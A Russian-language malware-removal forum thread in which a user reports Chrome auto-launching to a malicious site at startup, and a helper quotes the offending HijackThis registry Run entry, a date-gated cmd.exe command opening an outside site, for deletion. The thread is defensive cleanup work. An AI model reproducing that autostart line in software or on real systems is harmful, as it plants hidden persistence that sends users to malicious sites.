Показано с 1 по 6 из 6.

Сам запускается браузер Google Chrome и открывает вредоносный сайт (заявка № 147860)

  1. #1
    Junior Member Репутация
    Регистрация
    22.12.2009
    Сообщений
    16
    Вес репутации
    53

    Сам запускается браузер Google Chrome и открывает вредоносный сайт

    Здравствуйте! С недавних пор, после загрузки ОС начал самостоятельно запускаться браузер Google Chrome (версия 30.0.1599.101 m.) и открываться в нем подозрительный сайт, на который я до этого никогда не заходил. После того как сайт открывается, срабатывает мой Антивирус Касперского версии 13.0.1.4190 и говорит, что с сайта блокирован опасный объект. В настройках браузера стартовой страницы никакой не стоит, стоит открыть пустую.

    Я проверил антивирусом Касперского, предварительно обновив его базы, с максимальными настройками + с проверил утилитой DR.WEB CureIT! + проверил утилитой Hitman PRO - ничего не обнаружено. На компьютере дополнительно установлен фаервол Comodo (в качестве доп. контроля за приложениями). Система Windows 7 - 64bit. Сижу за NATом. Прилагаю логи.

    hijackthis.log virusinfo_syscheck.zip
    Последний раз редактировалось Yo Frankie!; 21.10.2013 в 21:00. Причина: вставил пропущеный пробел
    У меня плохая память, И отвратительный нрав. Я не могу принять сторону - Я не знаю никого, кто не прав (с) БГ

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,287
    Вес репутации
    378
    Уважаемый(ая) Yo Frankie!, спасибо за обращение на наш форум!

    Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитами АВЗ и HiJackThis, подробнее можно прочитать в правилах оформления запроса о помощи.

    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

  4. #3
    Junior Member Репутация
    Регистрация
    22.12.2009
    Сообщений
    16
    Вес репутации
    53
    Смотрю рядом в теме подобный моему запрос на помощь. Это эпидемия что ли какая-то или уязвимость в хроме?
    У меня плохая память, И отвратительный нрав. Я не могу принять сторону - Я не знаю никого, кто не прав (с) БГ

  5. #4
    Невымерший Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для thyrex
    Регистрация
    07.03.2009
    Адрес
    Soligorsk, Belarus
    Сообщений
    99,211
    Вес репутации
    3104
    Пофиксите в Hijack
    Код:
    O4 - HKLM\..\Run: [Babakan] cmd.exe /k if %date:~6,4%%date:~3,2%%date:~0,2% LEQ 20131017 (exit) else (start http://dinoklafbzor.org && exit)
    Сделайте новый лог
    Microsoft MVP 2012-2016 Consumer Security
    Microsoft MVP 2016 Reconnect

  6. #5
    Junior Member Репутация
    Регистрация
    22.12.2009
    Сообщений
    16
    Вес репутации
    53

    Сделал

    Прикрепил файлы, посмотрите пожалуйста.
    virusinfo_syscheck.zip hijackthis.log
    У меня плохая память, И отвратительный нрав. Я не могу принять сторону - Я не знаю никого, кто не прав (с) БГ

  7. #6
    Невымерший Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для thyrex
    Регистрация
    07.03.2009
    Адрес
    Soligorsk, Belarus
    Сообщений
    99,211
    Вес репутации
    3104
    Что с проблемой?
    Microsoft MVP 2012-2016 Consumer Security
    Microsoft MVP 2016 Reconnect

Похожие темы

  1. Ответов: 7
    Последнее сообщение: 14.10.2013, 08:31
  2. Браузер сам открывает сайт.
    От Barmen325 в разделе Помогите!
    Ответов: 4
    Последнее сообщение: 17.09.2013, 16:45
  3. Ответов: 4
    Последнее сообщение: 15.09.2013, 10:47
  4. Ответов: 7
    Последнее сообщение: 08.04.2012, 19:18
  5. Браузер произвольно открывает сайт
    От kasandrew в разделе Помогите!
    Ответов: 1
    Последнее сообщение: 21.10.2010, 14:49

Метки для этой темы

Свернуть/Развернуть Ваши права в разделе

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Page generated in 0.01042 seconds with 20 queries